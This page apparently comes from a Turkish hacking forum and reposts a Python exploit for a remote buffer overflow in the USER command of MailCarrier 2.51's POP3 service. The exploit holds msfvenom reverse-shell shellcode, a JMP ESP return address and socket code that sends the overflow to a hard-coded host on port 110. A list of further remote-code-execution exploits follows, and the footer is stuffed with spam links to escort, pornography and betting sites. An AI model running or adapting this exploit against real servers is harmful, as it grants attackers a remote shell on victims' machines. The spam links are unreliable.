[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

Win10 MailCarrier 2.51 - (POP3 User) Remote Buffer Overflow Exploit

#1
Win10 MailCarrier 2.51 - (POP3 User) Remote Buffer Overflow Exploit


Kod:
# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow
# Author: Lance Biggerstaff
# Original Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Tested on: Windows 10
# Note: Every version of Windows 10 has a different offset ¯\_(ツ)_/¯

#!/usr/bin/python

import sys
import socket
import time

#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISYTENING_PORT -b '\x00\xd9' -f python

buf =  ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c"
buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce"
buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a"
buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6"
buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8"
buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75"
buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0"
buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc"
buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8"
buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba"
buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06"
buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94"
buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c"
buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe"
buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c"
buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d"
buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11"
buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12"
buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e"
buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d"
buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7"
buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27"
buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c"
buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0"
buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb"
buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7"
buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3"
buf += "\x32\xb4\xfe\x5c"

jmpesp = '\x23\x49\xA1\x0F'

#buffer = '\x41' * 5093  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5093  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
buffer = '\x41' * 5095  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5097  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5099  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.121.87", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

#  0day.today [2019-11-10]  #
imza
Kırık link ve kural ihlallerini ihbar ediniz
[Resim: QP9DEZ.jpg]
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  WordPress Multi-Scheduler 1.0.0 Plugin - Cross-Site Request Forgery (Delete User) Vul NasyoneL 0 3 05-31-2020, 09:32 PM
Son Mesaj: NasyoneL
  QNAP QTS and Photo Station 6.0.3 - Remote Command Execution Exploit NasyoneL 0 3 05-31-2020, 09:30 PM
Son Mesaj: NasyoneL
  WordPress Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution Expl 0bir 0 10 05-28-2020, 04:36 PM
Son Mesaj: 0bir
  Pi-hole 4.4.0 - Remote Code Execution (Authenticated) Exploit 0bir 0 11 05-28-2020, 04:36 PM
Son Mesaj: 0bir
  OpenEMR 5.0.1 - Remote Code Execution Exploit 0bir 0 10 05-28-2020, 04:34 PM
Son Mesaj: 0bir



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts Istanbul escort Istanbul escort istanbul escort ankara escort istanbul escort eryaman escort etimesgut escort izmit escort En iyi bahis siteleri buca escort porno beylikdüzü escort eskişehir escort